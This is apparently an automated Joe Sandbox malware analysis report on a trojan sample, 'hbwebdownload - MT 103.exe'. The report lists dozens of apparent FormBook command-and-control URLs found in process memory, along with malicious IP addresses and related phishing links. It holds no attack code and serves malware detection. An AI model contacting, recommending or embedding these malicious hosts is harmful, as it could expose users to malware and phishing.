http://www.oko.eventsReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.etangkhap99.lol/c24t/www.oko.events	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ridges-freezers-56090.bondReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.vto.stream	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000006.00000000.2091503480.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4539423955.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nline-courses-classes-lv-1.bond/c24t/www.ourhealthyourlife.shop	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.etangkhap99.lol/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.orenzoplaybest14.xyz	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ourhealthyourlife.shop	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.1385.net/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.etangkhap99.lolReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ourhealthyourlife.shop/c24t/www.amilablackwell.online	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ridges-freezers-56090.bond	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000006.00000002.4536248023.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852394132.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851742437.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094406627.0000000009B9A000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000006.00000002.4533022181.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4534729011.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4534779593.0000000008890000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.amilablackwell.online/c24t/www.458881233.men	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ocoani.shopReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.7395.asiaReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.j88.travel/c24t/www.ridges-freezers-56090.bond	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.orenzoplaybest14.xyz/c24t/www.j88.travel	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.458881233.men/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ourhealthyourlife.shopReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.amilablackwell.onlineReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.1385.net	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.oko.events	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.consuyt.xyz/c24t/www.vto.stream	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ocoani.shop/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.nline-courses-classes-lv-1.bondReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.oko.events/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.orenzoplaybest14.xyzReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.j88.travelReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000006.00000000.2091503480.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.nline-courses-classes-lv-1.bond	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.vto.stream/c24t/www.fbpd.top	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hbwebdownload - MT 103.exe, 00000000.00000002.2091944473.0000000003035000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.458881233.menReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.458881233.men	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.nline-courses-classes-lv-1.bond/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/)s	explorer.exe, 00000006.00000002.4535238985.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2087085209.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000003.3095289336.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2093169355.000000000C860000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.est-life-insurance-2507.todayReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.vto.stream/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.j88.travel/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.j88.travel	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.7395.asia/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.orenzoplaybest14.xyz/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.consuyt.xyz/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.est-life-insurance-2507.today/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.vto.streamReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.est-life-insurance-2507.today/c24t/www.etangkhap99.lol	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	explorer.exe, 00000006.00000002.4542330951.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4524605308.0000000004542000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525657020.0000000004CEF000.00000004.10000000.00040000.00000000.sdmp, hbwebdownload - MT 103.exe	false	URL Reputation: safe	unknown
http://www.etangkhap99.lol	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.fbpd.top/c24t/www.1385.net	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com	explorer.exe, 00000006.00000000.2087085209.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094406627.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851742437.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4536299866.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3851951539.0000000009C92000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.7395.asia/c24t/www.ocoani.shop	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.fbpd.top	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.amilablackwell.online/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.oko.events/c24t/www.orenzoplaybest14.xyz	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.fbpd.topReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ocoani.shop	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.1385.net/c24t/www.nline-courses-classes-lv-1.bond	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.fbpd.top/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000006.00000000.2084445770.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4528531386.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ridges-freezers-56090.bond/c24t/www.consuyt.xyz	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ridges-freezers-56090.bond/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2	explorer.exe, 00000006.00000002.4542330951.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4525657020.00000000051DF000.00000004.10000000.00040000.00000000.sdmp	false		unknown
http://www.458881233.men/c24t/www.7395.asia	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.est-life-insurance-2507.today	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ocoani.shop/c24t/h	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000006.00000000.2087085209.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4535238985.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.7395.asia	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.consuyt.xyz	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://crl.v	explorer.exe, 00000006.00000002.4523936040.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2081212306.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.ourhealthyourlife.shop/c24t/	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.1385.netReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.amilablackwell.online	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.consuyt.xyzReferer:	explorer.exe, 00000006.00000002.4525788642.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3852075200.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094805181.0000000003542000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	www.j88.travel	European Union		13335	CLOUDFLARENETUS	true
185.26.122.70	www.oko.events	Russian Federation		62082	HOSTLANDRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523376
Start date and time:	2024-10-01 14:45:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	hbwebdownload - MT 103.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/6@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 124 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: hbwebdownload - MT 103.exe

Simulations

Behavior and APIs

Time	Type	Description
08:46:05	API Interceptor	1x Sleep call for process: hbwebdownload - MT 103.exe modified
08:46:07	API Interceptor	9x Sleep call for process: powershell.exe modified
08:46:15	API Interceptor	8663304x Sleep call for process: explorer.exe modified
08:46:50	API Interceptor	7841859x Sleep call for process: colorcpl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	update SOA.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/5hcm/
	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
